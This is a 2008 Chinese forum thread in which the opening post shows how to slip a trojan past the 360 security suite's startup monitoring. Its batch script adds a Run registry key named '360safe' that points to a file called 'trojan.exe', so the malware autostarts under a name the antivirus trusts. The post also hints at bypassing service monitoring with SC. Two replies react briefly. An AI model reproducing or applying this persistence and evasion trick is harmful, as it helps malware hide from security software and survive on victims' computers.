论坛风格切换
 
  • 帖子
  • 日志
  • 用户
  • 版块
  • 群组
帖子
购买邀请后未收到邀请联系sdbeta@qq.com
  • 1841阅读
  • 2回复

[求助-软件问题]看小黑们怎么突破你的360 [复制链接]

上一主题 下一主题
离线heiseyoumo
 
发帖
*
今日发帖
最后登录
1970-01-01
只看楼主 倒序阅读 使用道具 楼主  发表于: 2008-10-11 17:55:44
这个主要针对360对启动项的监控,至于突破服务监控感兴趣的可以通过SC来解决!

原理:木马启动项改成360已知的安全项

@echo off
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v 360safe /t REG_SZ /d "%SystemRoot%\temp\木马.exe" /f
echo 看看启动项里是不是多了一个木马.exe,可360并没有提示
pause
exit

其中360safe名字还可改为改成360antiarp,效果一样!
REG ADD命令:
/v 所选项之下要添加的值名
/f 不用提示强行改写现有注册表项
离线gsl27

发帖
4831
今日发帖
最后登录
2023-11-18
只看该作者 沙发  发表于: 2008-10-11 19:50:58
真的是要学习一下啊
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 板凳  发表于: 2008-10-11 23:48:05
回复 楼主 heiseyoumo 的帖子
不懂,不敢弄!